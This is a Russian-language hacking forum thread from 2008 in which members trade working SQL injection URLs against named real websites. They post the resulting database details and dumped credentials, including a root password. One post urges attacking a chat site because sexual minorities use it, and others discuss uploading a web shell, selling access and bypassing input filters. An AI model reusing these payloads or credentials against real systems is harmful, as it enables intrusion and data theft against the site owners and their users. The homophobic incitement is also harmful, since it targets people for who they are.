HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.12.2008, 02:51
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Журнал "Чайка"
PR:3 тИЦ:500

http://www.chayka.org/article.php?id=-872+union+select+1,2,3,4,5,6,7,8,9,10,11--
seagullmag@localhost:seagullmag:5.0.51a
Кавычки не фильтруются, но load_file не доступен.
Т.к. 5 версия можно перебирать таблицы...
Я нашел таблицу: ibf_members

P.S Вот, что я еще нашел)) http://www.chayka.org/db.inc. Ошибка вылетеле при заходе в /images/

Последний раз редактировалось Tigger; 11.12.2008 в 03:20..
 
Ответить с цитированием

  #2  
Старый 11.12.2008, 03:53
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами: 9644530

Репутация: 443
По умолчанию

http://www.msfacts.org/online_newsDetails.php?ID=-123+union+select+1,2,version(),user(),5,database()/*

version:4.0.24-standard
user:root@localhost
database:msf_db

С мускула логин и пароль

root:SQLadmin
 
Ответить с цитированием

  #3  
Старый 11.12.2008, 04:42
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

Е***шим по беспределу буржуйские чаты....
Вроде как сексуальные меньшинства там еще тусуются!!!
Смело помогаем админить этот отвратительный ресурс!!!

http://www.prassel.nu/index.php?page=ads&adno=-1+union+select+concat_ws
(0x3a3a,name,password,email),2,3+from+user+limit+1 ,1--

login:mats
pass:lkll00lkll00
 
Ответить с цитированием

  #4  
Старый 11.12.2008, 12:19
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию

http://www.greetingcard.org/about.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10--
5.0.67 - greetingcard@localhost - greetingcard_org_-_maindb
--------------------------------
http://www.simonsig.co.za/about.php?id=-1+union+select+1,concat_ws(char(3245,32),version() ,user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
5.0.51a-3ubuntu5.1-log ? simonsig@web-02.adept.co.za ? simonsig
-------------------
http://catalog.belstrin.ru/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24--
4.1.21-standard-log - clclon_user@localhost - clclon_catalogbelstrin
---------------------------
http://vis.vis-belogorje.ru/site.php?id=-1+union+select+concat_ws(char(32,45,32),version(%2 0),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24--
4.1.21-standard-log - clclon_user@localhost - clclon_visbelogorje
-----------------------------

Последний раз редактировалось masternet; 11.12.2008 в 12:28..
 
Ответить с цитированием

  #5  
Старый 11.12.2008, 17:25
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
С нами: 10137645

Репутация: 82
По умолчанию

_http://rifma.ru

http://rifma.ru/rifma.php?curr_node=55+union+select+1,concat(user_ name,char(58),user_password),3,4,5,6,7,8+from+user s+limit+0,1/*

Скуля есть, но вывод не сделал есть фильтрация в параметре "curr_node". Если не сложно подскажите как обойти.

Заранее спасибо.
 
Ответить с цитированием

  #6  
Старый 11.12.2008, 21:25
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию

http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9--
5.0.27-standard-log - WebUser@localhost - cgsc
PR: 6
-------------------------
http://www.adilsoz.kz/site.php?id=7&lan=english&newsid=-1+union+select+concat_ws(char(32,45,32),version(), user(),database())--
5.0.41-community-nt - adilsoz@localhost - adilsoz
ТИЦ: 160
PR: 2
-----------------------
http://www.oxygenna.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8--
5.0.27-community-nt - oxygenna@localhost - oxygenna
PR: 3
--------------------
http://epodsolar.com/site.php?id=-1+union+select+1,concat_ws(char(32,45,32),version( ),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
4.1.20 - epodsol_usr1@localhost - epodsol_cm
PR: 5
-------------------
http://gavlab.auburn.edu/about.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4--
4.1.22-log - gavlab@web1.duc.auburn.edu - gavlab
PR: 4
--------------------
http://www.swiss.org.nz/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(char(32,4 5,32),version(),user(),database()),10,11,12,13,14, 15,16,17,18,19--
4.1.21-standard-log - swisst@117.104.160.18 - swisst db
ТИЦ : 10 PR: 4
----------------------
http://www.poveditions.com/home.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
ТИЦ : 10 PR: 4
----------------------

Последний раз редактировалось masternet; 11.12.2008 в 23:45..
 
Ответить с цитированием

  #7  
Старый 11.12.2008, 23:45
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

masternet, в http://cgsc2.biology.yale.edu кавычки не фильтруются и file priv разрешен. Найдешь путь - зальешь шелл))
 
Ответить с цитированием

  #8  
Старый 11.12.2008, 23:56
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию

Цитата:
Сообщение от Tigger  
masternet, в http://cgsc2.biology.yale.edu кавычки не фильтруются и file priv разрешен. Найдешь путь - зальешь шелл))
а как путь узнать?вот в чём вопрос..так бы уже залил и продал)
у меня в дампере также..
Y - file priv

Последний раз редактировалось masternet; 12.12.2008 в 00:33..
 
Ответить с цитированием

  #9  
Старый 12.12.2008, 00:26
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

masternet,
Тема не для вопросов и комментариев
Tigger
С чего ты взял, что file_priv Y ?

http://cgsc2.biology.yale.edu/Site.php?ID=-1+union+select+1,file_priv,3,4,5,6,7,8,9+from+mysq l.user+where+user='WebUser'--
"N"
 
Ответить с цитированием

  #10  
Старый 12.12.2008, 10:15
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию

Цитата:
http://boutique.toutec.fr/lire/index.php?rubid=-1+union+select+1,2,null,4,unhex(hex(concat_ws(char (32,45,32),version(),user(),database()))),6,7,8,9, 0--
version( 5.0.15-standard )
user(
toutec@localhost )
database(
toutec )
Цитата:
http://boutique.toutec.fr/lire/index.php?rubid=-1+union+select+1,2,null,4,unhex(hex(concat_ws(char (32,45,32),table_name,column_name))),6,7,8,9,0+fro m+information_schema.columns--
##########
Цитата:
http://www.webridershop.com/boutik/lire/index.php?rubid=-1+union+select+1,2,null,unhex(hex(concat_ws(char(3 2,45,32),version(),user(),database()))),5,null,7,8--
version( 4.1.15-Debian_1ubuntu5-log )
user(
webrider@localhost )
database(
webridershop )

##############
Цитата:
http://www.compasdigital.be/lire/index.php?rubid=24+union+select+1,concat_ws(char(3 2,45,32),version(),user(),database()),3--
version( 4.1.22-log )
user(
formule19@10.0.0.78 )
database(
formule19 )

Последний раз редактировалось gisTy; 12.12.2008 в 10:28..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.